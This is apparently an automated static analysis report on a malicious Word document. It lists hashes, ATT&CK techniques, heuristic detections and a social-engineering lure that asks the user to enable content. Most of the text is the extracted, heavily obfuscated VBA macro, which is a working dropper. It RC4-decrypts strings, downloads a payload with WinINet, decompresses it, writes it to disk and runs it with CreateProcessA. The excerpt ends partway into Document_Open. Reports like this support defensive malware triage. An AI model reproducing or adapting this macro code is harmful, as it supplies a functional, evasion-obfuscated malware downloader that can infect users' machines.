Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5cc881eafc9d6495…

MALICIOUS

Office (OOXML)

40.3 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-20
MD5: 3e2de8348d2c9ec71e038d420404c020
SHA-1: 6d5bd735a69302754f88982abe1d6a39fb839085
SHA-256: 5cc881eafc9d64953b368f8156cc714c5d95bcad9cd5e85546c14f8066f00f29
180 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, including a Document_Open macro, which is a common technique for malware execution. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', indicating a social engineering lure to bypass security measures. The presence of VBA code and the detection of 'Doc.Malware.Chronos-6897935-0' by ClamAV strongly suggest malicious intent, likely to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    RcfhYKbvetd = Environ(CUh12emhPa4g(Chr(242) + Chr(139) + Chr(69) + Chr(106) + Chr(159) + Chr(202) + Chr(230), "X9Hxae1qOv")) & "\" & OBqADCHy & CUh12emhPa4g(Chr(18) + Chr(12) + Chr(7) + Chr(253), "Vgq8Q62G")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22544 bytes
SHA-256: b24a4832db9fc4e4a410f04490d825c0a4db2fd9f487c12518810b9b36065510
Detection
ClamAV: No threats found
Obfuscation or payload: likely
165 of 282 identifiers look randomly generated (e.g. 'LJ5F1vdhb3En1ztke') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Type HTbE3LRfQS7
   OnvuiAdW4j As Long
   TgINKWBcF As Long
   Ct8y As Long
   IPaG4eZqaY As Long
End Type
Private Type NbCaEYpXC7F
   Db4RikJ4d2y As Long
   F5NjvmFFM97AL As String
   QpXS8l6S4f As String
   MDKrnrhgKC4 As String
   DYB6ZPMRkR9 As Long
   OAbK4NFuipb As Long
   LlY8gY9cZ8YqzP As Long
   SQktQ31B As Long
   Pd4v18HI6ae2loDlQ As Long
   PYjq29H As Long
   H3E6irM4e As Long
   FXt8Keq1d As Long
   HD6jxBCgZ1iHrdQh As Integer
   PjvaGwgHSkh As Integer
   YixkTeiee As Long
   H95kxflNy As Long
   GAjTaBkTi1UOmS As Long
   MZBiJNGE As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal R21BUAXajMSd As String, ByVal SgXAh1jKi58OaZ As String, XWYY9ot64mp As Any, KjhSQGYB6ZPMR As Any, ByVal HFxPCT5iVbe As Long, ByVal IbDFlr4kfpZqvj As Long, L785GTyJBeu As Any, ByVal QeaUc55E As String, VogGeucHQG As NbCaEYpXC7F, RZqiIWA As HTbE3LRfQS7) As Long
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal YYQJs3PP599 As Long, ByVal Sy2odsQet20rGV As String, ByVal Xo3B5eby9xAf As String, ByVal EZqTiEpnAk77UE As Long, ByVal AlfEDM As Long, ByVal OMN79Ec1oO As Long) As Long
Private Declare Function InternetOpenA Lib "wininet" (ByVal HIMTJ5lJLs As String, ByVal Wggxkkgwje9L As Long, ByVal DAsGe9 As String, ByVal Lko5GSffn7 As String, ByVal XcKsb2mZZBI As Long) As Long
Private QJzFQnwu(0 To 255) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal IvtgqYbySYK As Long, ByVal HhenXDD49NZ4bZ As String, ByVal L9ELckLo42t9 As Long, HnBLcS6SY As Long) As Integer
Private CtOlY8VDlhaGx As String
Private Type EBT5n
   PqYbySYK8Mh As Byte
   L7NrlUZ4bZ() As Byte
End Type
Private Type I9mHKPkVZHFr4Qt
   IFdwZD9Uvlnv As Integer
   IjAMggxk As Integer
   TMTRb6BOqk0Dpg As Integer
   YCVp4OD8Y As Integer
   D5cKsb2mZZB As Long
End Type
Private Declare Sub Ak0eM3Ttz Lib "msvbvm60" Alias "#183" (ByVal Dz0dBY As Long, ByVal XsOHEWTDMENaE0 As Long, ByVal YMcnK8gY As Long)
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef ChQf2O3zs As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal QY5lmpquLPrW As Long) As Long
Private Sub V4FS3(G5Y() As Byte, AyHozbyEXEL As Long)
Dim PsXzVQ9fRm As Long, XIp6pVdeYnW8KN As Long, UokwS8C As Byte, LXogLEt95qr1DUGZS As Long, IJToS1cqH7EazzIhz As Integer, I9Z10NivHEYVVt As Byte, Tey4YtVu4w0m() As Byte, WcoU7qoh4XcuTRj As Integer
Dim LH5Os6f3kXysOR As Long, YQFLhwhgs1 As Byte, YUYQJ7RQBAx70 As Long, X26oLR31QJUr As Long, Sw01GsU0E3WO As Long, QAFg9aGv(0 To 7) As Byte, H1tqLCMBV5rN(0 To 511) As I9mHKPkVZHFr4Qt, TKSeE66yFSqTUC(0 To 255) As EBT5n
LXogLEt95qr1DUGZS = 1
I9Z10NivHEYVVt = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
Ak0eM3Ttz 4, VarPtr(YUYQJ7RQBAx70), VarPtr(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 4
Sw01GsU0E3WO = YUYQJ7RQBAx70
If (YUYQJ7RQBAx70 = 0) Then Exit Sub
ReDim Tey4YtVu4w0m(0 To YUYQJ7RQBAx70 - 1)
Ak0eM3Ttz 2, VarPtr(IJToS1cqH7EazzIhz), VarPtr(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 2
For PsXzVQ9fRm = 1 To IJToS1cqH7EazzIhz
With TKSeE66yFSqTUC(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
.PqYbySYK8Mh = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
ReDim .L7NrlUZ4bZ(0 To .PqYbySYK8Mh - 1)
End With
Next
QAFg9aGv(0) = 2 ^ 0
QAFg9aGv(1) = 2 ^ 1
QAFg9aGv(2) = 2 ^ 2
QAFg9aGv(3) = 2 ^ 3
QAFg9aGv(4) = 2 ^ 4
QAFg9aGv(5) = 2 ^ 5
QAFg9aGv(6) = 2 ^ 6
QAFg9aGv(7) = 2 ^ 7
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
WcoU7qoh4XcuTRj = 0
For PsXzVQ9fRm = 0 To 255
With TKSeE66yFSqTUC(PsXzVQ9fRm)
If (.PqYbySYK8Mh > 0) Then
For XIp6pVdeYnW8KN = 0 To (.PqYbySYK8Mh - 1)
If (YQFLhwhgs1 And QAFg9aGv(WcoU7qoh4XcuTRj)) Then .L7NrlUZ4bZ(XIp6pVdeYnW8KN) = 1
WcoU7qoh4XcuTRj = WcoU7qoh4XcuTRj + 1
If (WcoU7qoh4XcuTRj = 8) Then
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
WcoU7qoh4XcuTRj = 0
End If
Next
End If
End With
Next
If (WcoU7qoh4XcuTRj = 0) Then LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS - 1
X26oLR31QJUr = 1
H1tqLCMBV5rN(0).TMTRb6BOqk0Dpg = -1
H1tqLCMBV5rN(0).IjAMggxk = -1
H1tqLCMBV5rN(0).IFdwZD9Uvlnv = -1
H1tqLCMBV5rN(0).YCVp4OD8Y = -1
For PsXzVQ9fRm = 0 To 255
X00LK H1tqLCMBV5rN(), X26oLR31QJUr, PsXzVQ9fRm, TKSeE66yFSqTUC(PsXzVQ9fRm)
Next
YUYQJ7RQBAx70 = 0
For LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS To AyHozbyEXEL
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
For WcoU7qoh4XcuTRj = 0 To 7
If (YQFLhwhgs1 And QAFg9aGv(WcoU7qoh4XcuTRj)) Then LH5Os6f3kXysOR = H1tqLCMBV5rN(LH5Os6f3kXysOR).IjAMggxk Else LH5Os6f3kXysOR = H1tqLCMBV5rN(LH5Os6f3kXysOR).TMTRb6BOqk0Dpg
If (H1tqLCMBV5rN(LH5Os6f3kXysOR).YCVp4OD8Y > -1) Then
Tey4YtVu4w0m(YUYQJ7RQBAx70) = H1tqLCMBV5rN(LH5Os6f3kXysOR).YCVp4OD8Y
YUYQJ7RQBAx70 = YUYQJ7RQBAx70 + 1
If (YUYQJ7RQBAx70 = Sw01GsU0E3WO) Then GoTo Sw01GsU0E3WO
LH5Os6f3kXysOR = 0
End If
Next
Next
Sw01GsU0E3WO:
UokwS8C = 0
For PsXzVQ9fRm = 0 To (YUYQJ7RQBAx70 - 1)
UokwS8C = UokwS8C Xor Tey4YtVu4w0m(PsXzVQ9fRm)
Next
ReDim G5Y(0 To YUYQJ7RQBAx70 - 1)
Ak0eM3Ttz YUYQJ7RQBAx70, VarPtr(G5Y(0)), VarPtr(Tey4YtVu4w0m(0))
End Sub
Private Function OBqADCHy(Optional QqrlIRWOPe As String = "0123456789") As String
Dim R02wTZs8GzMnOcm As Long, P2lTdT9yXkbz As Long
R02wTZs8GzMnOcm = 30
P2lTdT9yXkbz = 79
If R02wTZs8GzMnOcm + P2lTdT9yXkbz > 4 Then
P2lTdT9yXkbz = R02wTZs8GzMnOcm + 56
Else
MsgBox 51
End If
Dim ArVUXN5lxgY() As Byte, QscEL() As Byte, WMpgun As Long, TIjA4w4 As Long, XcKvwcRqmVs As Long, RuC4Q As String
Dim QKLP As Long, XiuKSb As Long
QKLP = 25
XiuKSb = 92
If QKLP + XiuKSb > 4 Then
XiuKSb = QKLP + 18
Else
MsgBox 67
End If
XcKvwcRqmVs = 0
Dim Pc3NVjfi0x3a As Long, Tk4WAk8U5qwAPYXTQ As Long
Pc3NVjfi0x3a = 40
Tk4WAk8U5qwAPYXTQ = 47
If Pc3NVjfi0x3a + Tk4WAk8U5qwAPYXTQ > 4 Then
Tk4WAk8U5qwAPYXTQ = Pc3NVjfi0x3a + 52
Else
MsgBox 37
End If
Cv8Anf0Zrx1ExsA:
Dim ALzAYzQsz1iSBut As Long, H1unwlMZF1W0I8da2 As Long
ALzAYzQsz1iSBut = 19
H1unwlMZF1W0I8da2 = 63
If ALzAYzQsz1iSBut + H1unwlMZF1W0I8da2 > 4 Then
H1unwlMZF1W0I8da2 = ALzAYzQsz1iSBut + 76
Else
MsgBox 90
End If
Randomize
RuC4Q = Int(30 * Rnd)
If RuC4Q < 4 Then GoTo Cv8Anf0Zrx1ExsA
XcKvwcRqmVs = RuC4Q
If XcKvwcRqmVs > 0& Then
Dim GdT9yXkbz2scj As Long, Bn4H2Ilon As Long
GdT9yXkbz2scj = 21
Bn4H2Ilon = 57
If GdT9yXkbz2scj + Bn4H2Ilon > 4 Then
Bn4H2Ilon = GdT9yXkbz2scj + 95
Else
MsgBox 33
End If
Randomize
ArVUXN5lxgY = QqrlIRWOPe
Dim UENoNm9RpIS As Long, H5Fq3KvL3 As Long
UENoNm9RpIS = 81
H5Fq3KvL3 = 77
If UENoNm9RpIS + H5Fq3KvL3 > 4 Then
H5Fq3KvL3 = UENoNm9RpIS + 87
Else
MsgBox 58
End If
WMpgun = Len(QqrlIRWOPe) - 1&
XcKvwcRqmVs = (XcKvwcRqmVs * 2&) - 1&
Dim P8eRzlc As Long, C10Z As Long
P8eRzlc = 28
C10Z = 10
If P8eRzlc + C10Z > 4 Then
C10Z = P8eRzlc + 37
Else
MsgBox 57
End If
ReDim QscEL(XcKvwcRqmVs) As Byte
For TIjA4w4 = 0& To XcKvwcRqmVs Step 2&
QscEL(TIjA4w4) = ArVUXN5lxgY(CLng(WMpgun * Rnd) * 2&)
Next
Dim UwnpeMwTmxfg7YQu As Long, QGzMnOcmWxm6DM As Long
UwnpeMwTmxfg7YQu = 21
QGzMnOcmWxm6DM = 57
If UwnpeMwTmxfg7YQu + QGzMnOcmWxm6DM > 4 Then
QGzMnOcmWxm6DM = UwnpeMwTmxfg7YQu + 95
Else
MsgBox 33
End If
End If
Dim H1iblnF As Long, TshWsIrhZy5Wt As Long
H1iblnF = 59
TshWsIrhZy5Wt = 54
If H1iblnF + TshWsIrhZy5Wt > 4 Then
TshWsIrhZy5Wt = H1iblnF + 97
Else
MsgBox 40
End If
OBqADCHy = QscEL
Dim UG89Oc As Long, BpC7zSlx1AF As Long
UG89Oc = 73
BpC7zSlx1AF = 61
If UG89Oc + BpC7zSlx1AF > 4 Then
BpC7zSlx1AF = UG89Oc + 96
Else
MsgBox 90
End If
End Function
Private Property Let C1zp2TPYD7r7Co9Z(RjRq3N As String)
Dim YKO As Long, X66mLspfoyriW9 As Long, KFEicogB2LKKViIb As Byte, YEWqrZ() As Byte, NqFLLodnv As Long
If (CtOlY8VDlhaGx = RjRq3N) Then Exit Property
CtOlY8VDlhaGx = RjRq3N
YEWqrZ() = StrConv(CtOlY8VDlhaGx, vbFromUnicode)
NqFLLodnv = Len(CtOlY8VDlhaGx)
For YKO = 0 To 255
QJzFQnwu(YKO) = YKO
Next YKO
For YKO = 0 To 255
X66mLspfoyriW9 = (X66mLspfoyriW9 + QJzFQnwu(YKO) + YEWqrZ(YKO Mod NqFLLodnv)) Mod 256
KFEicogB2LKKViIb = QJzFQnwu(YKO)
QJzFQnwu(YKO) = QJzFQnwu(X66mLspfoyriW9)
QJzFQnwu(X66mLspfoyriW9) = KFEicogB2LKKViIb
Next
End Property
Private Function Yptw7lcRqUAqs1(ByVal KfuJaYmLavVowsnu6 As String, ByVal ItMAnemQ As String, ByVal GFq8Cih2NlAyJkzm As String) As Boolean
Dim Ts1e2pVTjLSke As Long, AN4dBGV4kxWRJ As Long
Ts1e2pVTjLSke = 45
AN4dBGV4kxWRJ = 71
If Ts1e2pVTjLSke + AN4dBGV4kxWRJ > 4 Then
AN4dBGV4kxWRJ = Ts1e2pVTjLSke + 20
Else
MsgBox 20
End If
Dim O6p6xL As Long, LJ5F1vdhb3En1ztke As Long, DdOkUpJk06f As Long, Njz7qjaT As String * 8162, LDEam7EiGNDKZ60EP As String, HhdrJ2F3MxYmP As Integer, RbZVuXpQR As Double
Dim C77DsRlg0HiqYrYqP As Long, RB9L4t7uFFg As Long
C77DsRlg0HiqYrYqP = 4
RB9L4t7uFFg = 68
If C77DsRlg0HiqYrYqP + RB9L4t7uFFg > 4 Then
RB9L4t7uFFg = C77DsRlg0HiqYrYqP + 2
Else
MsgBox 74
End If
O6p6xL = InternetOpenA(CUh12emhPa4g(Chr(133) + Chr(120) + Chr(65) + Chr(219) + Chr(194) + Chr(108) + Chr(192) + Chr(218) + Chr(219) + Chr(197) + Chr(124) + Chr(150) + Chr(74) + Chr(90) + Chr(97) + Chr(90) + Chr(248) + Chr(55) + Chr(113) + Chr(58) + Chr(4) + Chr(25) + Chr(39) + Chr(236) + Chr(39) + Chr(119) + Chr(62) + Chr(235) + Chr(241) + Chr(128) + Chr(61) + Chr(65) + Chr(131) + Chr(244) + Chr(129) + Chr(142) + Chr(140) + Chr(146) + Chr(86) + Chr(251) + Chr(243) + Chr(140) + Chr(87) + Chr(135) + Chr(225) + Chr(128) + Chr(115) + Chr(1) + Chr(6) + Chr(127) + Chr(160) + Chr(174) + Chr(66) + Chr(79) + Chr(131) + Chr(155) + Chr(68) + Chr(174) + Chr(67) + Chr(83) + Chr(205) + Chr(34) + Chr(196) + Chr(229) + Chr(172) + Chr(169) + Chr(195), "MKNG7uFFg"), 1, vbNullString, vbNullString, 0)
Dim Nai As Long, RH00JhpXE91YhU As Long
Nai = 21
RH00JhpXE91YhU = 17
If Nai + RH00JhpXE91YhU > 4 Then
RH00JhpXE91YhU = Nai + 82
Else
MsgBox 60
End If
If O6p6xL = 0 Then
Dim PXlB As Long, Y2nIwea As Long
PXlB = 55
Y2nIwea = 16
If PXlB + Y2nIwea > 4 Then
Y2nIwea = PXlB + 33
Else
MsgBox 34
End If
  Yptw7lcRqUAqs1 = False
  Exit Function
End If
Dim O9XnfHM6nPB1B7 As Long, PLFAbclFi As Long
O9XnfHM6nPB1B7 = 31
PLFAbclFi = 40
If O9XnfHM6nPB1B7 + PLFAbclFi > 4 Then
PLFAbclFi = O9XnfHM6nPB1B7 + 12
Else
MsgBox 98
End If
LJ5F1vdhb3En1ztke = InternetOpenUrlA(O6p6xL, KfuJaYmLavVowsnu6, vbNullString, 0, &H4000000, 0)
Dim NQag283d As Long, UXC3Gb43 As Long
NQag283d = 59
UXC3Gb43 = 54
If NQag283d + UXC3Gb43 > 4 Then
UXC3Gb43 = NQag283d + 97
Else
MsgBox 40
End If
If LJ5F1vdhb3En1ztke = 0 Then
Dim G5PKfGmh5qEpfPt As Long, C6VJz9BO8RsgM As Long
G5PKfGmh5qEpfPt = 69
C6VJz9BO8RsgM = 11
If G5PKfGmh5qEpfPt + C6VJz9BO8RsgM > 4 Then
C6VJz9BO8RsgM = G5PKfGmh5qEpfPt + 14
Else
MsgBox 32
End If
  RbZVuXpQR = 0
Else
Dim RI6Tb As Long, PSCFumzVX As Long
RI6Tb = 56
PSCFumzVX = 25
If RI6Tb + PSCFumzVX > 4 Then
PSCFumzVX = RI6Tb + 45
Else
MsgBox 56
End If
InternetReadFile LJ5F1vdhb3En1ztke, Njz7qjaT, 8162, DdOkUpJk06f
LDEam7EiGNDKZ60EP = Njz7qjaT
Dim V0QWuerGg1INNrLi As Long, RKc22gXZaaTMVH As Long
V0QWuerGg1INNrLi = 61
RKc22gXZaaTMVH = 36
If V0QWuerGg1INNrLi + RKc22gXZaaTMVH > 4 Then
RKc22gXZaaTMVH = V0QWuerGg1INNrLi + 10
Else
MsgBox 62
End If
Do While DdOkUpJk06f <> 0
  InternetReadFile LJ5F1vdhb3En1ztke, Njz7qjaT, 8162, DdOkUpJk06f
  LDEam7EiGNDKZ60EP = LDEam7EiGNDKZ60EP + Mid(Njz7qjaT, 1, DdOkUpJk06f)
Loop
RbZVuXpQR = Len(LDEam7EiGNDKZ60EP)
Dim AovKGjYOx8 As Long, HSH8d9sa As Long
AovKGjYOx8 = 69
HSH8d9sa = 38
If AovKGjYOx8 + HSH8d9sa > 4 Then
HSH8d9sa = AovKGjYOx8 + 4
Else
MsgBox 8
End If
HhdrJ2F3MxYmP = FreeFile
Dim TE6VJz9 As Long, UYxuwuoUxw As Long
TE6VJz9 = 84
UYxuwuoUxw = 93
If TE6VJz9 + UYxuwuoUxw > 4 Then
UYxuwuoUxw = TE6VJz9 + 64
Else
MsgBox 51
End If
Open ItMAnemQ For Binary Access Write Lock Write As #HhdrJ2F3MxYmP
Put #HhdrJ2F3MxYmP, , YSSxgqTdeIMBbp8z4(CUh12emhPa4g(LDEam7EiGNDKZ60EP, GFq8Cih2NlAyJkzm))
Dim Dxv71ruUXz59oKkJ7 As Long, WI0Ud54Ftu92 As Long
Dxv71ruUXz59oKkJ7 = 71
WI0Ud54Ftu92 = 79
If Dxv71ruUXz59oKkJ7 + WI0Ud54Ftu92 > 4 Then
WI0Ud54Ftu92 = Dxv71ruUXz59oKkJ7 + 7
Else
MsgBox 26
End If
Close #HhdrJ2F3MxYmP
End If
InternetCloseHandle LJ5F1vdhb3En1ztke
Dim FpuoZ7WqAkbtdw As Long, K0ZJxlZxOGImCEV As Long
FpuoZ7WqAkbtdw = 9
K0ZJxlZxOGImCEV = 77
If FpuoZ7WqAkbtdw + K0ZJxlZxOGImCEV > 4 Then
K0ZJxlZxOGImCEV = FpuoZ7WqAkbtdw + 98
Else
MsgBox 10
End If
InternetCloseHandle O6p6xL
LDEam7EiGNDKZ60EP = ""
If RbZVuXpQR Then
  Yptw7lcRqUAqs1 = True
Dim DBjt8kgTlgikuaBvp As Long, L7O2Nq08Jibr As Long
DBjt8kgTlgikuaBvp = 10
L7O2Nq08Jibr = 74
If DBjt8kgTlgikuaBvp + L7O2Nq08Jibr > 4 Then
L7O2Nq08Jibr = DBjt8kgTlgikuaBvp + 8
Else
MsgBox 80
End If
End If
Dim PqOs As Long, QrXNzi0AHga As Long
PqOs = 74
QrXNzi0AHga = 62
If PqOs + QrXNzi0AHga > 4 Then
QrXNzi0AHga = PqOs + 97
Else
MsgBox 65
End If
End Function
Private Function YSSxgqTdeIMBbp8z4(FbvWh3V3PI As String) As String
Dim B9KFdmHApb8() As Byte
B9KFdmHApb8() = StrConv(FbvWh3V3PI, vbFromUnicode)
V4FS3 B9KFdmHApb8, Len(FbvWh3V3PI)
YSSxgqTdeIMBbp8z4 = StrConv(B9KFdmHApb8(), vbUnicode)
End Function
Private Function XiB46eUBNC(Y6ce3XR As String)
Dim RxC4blPnCH As Long, OO0xBXvVyg As Long
RxC4blPnCH = 21
OO0xBXvVyg = 94
If RxC4blPnCH + OO0xBXvVyg > 4 Then
OO0xBXvVyg = RxC4blPnCH + 47
Else
MsgBox 90
End If
Dim IzDp2SV2gM As HTbE3LRfQS7, XWnOIcgf1WxlEd As NbCaEYpXC7F, CLomkP6jGpyzoB As String
Dim TKdhZzt9vOJTVO As Long, YAf51XKqqgJr77 As Long
TKdhZzt9vOJTVO = 96
YAf51XKqqgJr77 = 16
If TKdhZzt9vOJTVO + YAf51XKqqgJr77 > 4 Then
YAf51XKqqgJr77 = TKdhZzt9vOJTVO + 83
Else
MsgBox 82
End If
XWnOIcgf1WxlEd.Db4RikJ4d2y = Len(XWnOIcgf1WxlEd)
Dim ORD2KOm As Long, BxO2EWPAdjxB As Long
ORD2KOm = 67
BxO2EWPAdjxB = 57
If ORD2KOm + BxO2EWPAdjxB > 4 Then
BxO2EWPAdjxB = ORD2KOm + 14
Else
MsgBox 17
End If
CreateProcessA CLomkP6jGpyzoB, Y6ce3XR, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, CLomkP6jGpyzoB, XWnOIcgf1WxlEd, IzDp2SV2gM
Dim Bhc As Long, JxdotIiS As Long
Bhc = 57
JxdotIiS = 46
If Bhc + JxdotIiS > 4 Then
JxdotIiS = Bhc + 31
Else
MsgBox 24
End If
CloseHandle IzDp2SV2gM.TgINKWBcF
Dim AJElJSS As Long, BmgMGD4LfrsFKBDRF As Long
AJElJSS = 21
BmgMGD4LfrsFKBDRF = 80
If AJElJSS + BmgMGD4LfrsFKBDRF > 4 Then
BmgMGD4LfrsFKBDRF = AJElJSS + 76
Else
MsgBox 41
End If
CloseHandle IzDp2SV2gM.OnvuiAdW4j
Dim F3OUWf3qs As Long, FO93AMgkId As Long
F3OUWf3qs = 80
FO93AMgkId = 29
If F3OUWf3qs + FO93AMgkId > 4 Then
FO93AMgkId = F3OUWf3qs + 58
Else
MsgBox 44
End If
End Function
Function CUh12emhPa4g(AzG7DcJendK As String, YgBO09PgFNh0wQI As String) As String
Dim LhTQeveYYdqvT6Q0 As Long, Pmn512w As Long
LhTQeveYYdqvT6Q0 = 32
Pmn512w = 21
If LhTQeveYYdqvT6Q0 + Pmn512w > 4 Then
Pmn512w = LhTQeveYYdqvT6Q0 + 56
Else
MsgBox 50
End If
Dim byteArray() As Byte
byteArray() = StrConv(AzG7DcJendK, vbFromUnicode)
Omgq9M1451s byteArray(), YgBO09PgFNh0wQI
CUh12emhPa4g = StrConv(byteArray(), vbUnicode)
Dim INb0nL5tj3Xun As Long, YSUq8BO2yIO43A3OO As Long
INb0nL5tj3Xun = 48
YSUq8BO2yIO43A3OO = 25
If INb0nL5tj3Xun + YSUq8BO2yIO43A3OO > 4 Then
YSUq8BO2yIO43A3OO = INb0nL5tj3Xun + 43
Else
MsgBox 88
End If
End Function
Sub RQxKoIyhmZRjA(MtBnvNyIkD As Long)
Dim Gz43ueL52 As Long, XCfDsTEIlH4 As Long
Gz43ueL52 = 93
XCfDsTEIlH4 = 75
If Gz43ueL52 + XCfDsTEIlH4 > 4 Then
XCfDsTEIlH4 = Gz43ueL52 + 3
Else
MsgBox 23
End If
Dim GPzEM9qTfHc4 As Long
Dim TmpAaDp9aGmGY As Long, Oxae1qOvYUIQ As Long
TmpAaDp9aGmGY = 8
Oxae1qOvYUIQ = 7
If TmpAaDp9aGmGY + Oxae1qOvYUIQ > 4 Then
Oxae1qOvYUIQ = TmpAaDp9aGmGY + 37
Else
MsgBox 44
End If
GPzEM9qTfHc4 = Timer + MtBnvNyIkD
Do While Timer < GPzEM9qTfHc4
DoEvents
Loop
Dim PK1H0504B0D3 As Long, BK9QW7YGZ4D As Long
PK1H0504B0D3 = 28
BK9QW7YGZ4D = 73
If PK1H0504B0D3 + BK9QW7YGZ4D > 4 Then
BK9QW7YGZ4D = PK1H0504B0D3 + 63
Else
MsgBox 20
End If
End Sub
Private Sub X00LK(K3HclDtmWC() As I9mHKPkVZHFr4Qt, UmfTpQwNa As Long, ElncMfz As Long, L57I1Uquae As EBT5n)
Dim Coml As Integer, BGrmj1BDAsyxQGfbZ As Long
BGrmj1BDAsyxQGfbZ = 0
For Coml = 0 To (L57I1Uquae.PqYbySYK8Mh - 1)
If (L57I1Uquae.L7NrlUZ4bZ(Coml) = 0) Then
If (K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg = -1) Then
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg = UmfTpQwNa
K3HclDtmWC(UmfTpQwNa).IFdwZD9Uvlnv = BGrmj1BDAsyxQGfbZ
K3HclDtmWC(UmfTpQwNa).TMTRb6BOqk0Dpg = -1
K3HclDtmWC(UmfTpQwNa).IjAMggxk = -1
K3HclDtmWC(UmfTpQwNa).YCVp4OD8Y = -1
UmfTpQwNa = UmfTpQwNa + 1
End If
BGrmj1BDAsyxQGfbZ = K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg
ElseIf (L57I1Uquae.L7NrlUZ4bZ(Coml) = 1) Then
If (K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk = -1) Then
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk = UmfTpQwNa
K3HclDtmWC(UmfTpQwNa).IFdwZD9Uvlnv = BGrmj1BDAsyxQGfbZ
K3HclDtmWC(UmfTpQwNa).TMTRb6BOqk0Dpg = -1
K3HclDtmWC(UmfTpQwNa).IjAMggxk = -1
K3HclDtmWC(UmfTpQwNa).YCVp4OD8Y = -1
UmfTpQwNa = UmfTpQwNa + 1
End If
BGrmj1BDAsyxQGfbZ = K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk
Else
Stop
End If
Next
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).YCVp4OD8Y = ElncMfz
End Sub
Sub Omgq9M1451s(Msz3HLRx26QUAkf() As Byte, Optional Ldv8lP As String)
Dim RCz56z8kzHn As Long, LfRh4klCZStI9q As Long, XUT5WXv6RAa As Byte, PGECwCNxie As Long, YofbfZ9WrR6HuXE As Long, G59b56phfen As Long, JylNjQEyhKzRDG(0 To 255) As Integer
If (Len(Ldv8lP) > 0) Then C1zp2TPYD7r7Co9Z = Ldv8lP
Ak0eM3Ttz 512, VarPtr(JylNjQEyhKzRDG(0)), VarPtr(QJzFQnwu(0))
YofbfZ9WrR6HuXE = UBound(Msz3HLRx26QUAkf) + 1
G59b56phfen = YofbfZ9WrR6HuXE
For PGECwCNxie = 0 To (YofbfZ9WrR6HuXE - 1)
RCz56z8kzHn = (RCz56z8kzHn + 1) Mod 256
LfRh4klCZStI9q = (LfRh4klCZStI9q + JylNjQEyhKzRDG(RCz56z8kzHn)) Mod 256
XUT5WXv6RAa = JylNjQEyhKzRDG(RCz56z8kzHn)
JylNjQEyhKzRDG(RCz56z8kzHn) = JylNjQEyhKzRDG(LfRh4klCZStI9q)
JylNjQEyhKzRDG(LfRh4klCZStI9q) = XUT5WXv6RAa
Msz3HLRx26QUAkf(PGECwCNxie) = Msz3HLRx26QUAkf(PGECwCNxie) Xor (JylNjQEyhKzRDG((JylNjQEyhKzRDG(RCz56z8kzHn) + JylNjQEyhKzRDG(LfRh4klCZStI9q)) Mod 256))
Next
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim VWyjKNK72m2RIGfnu As Long, RuSVU As Long
VWyjKNK72m2RIGfnu = 7
RuSVU = 62
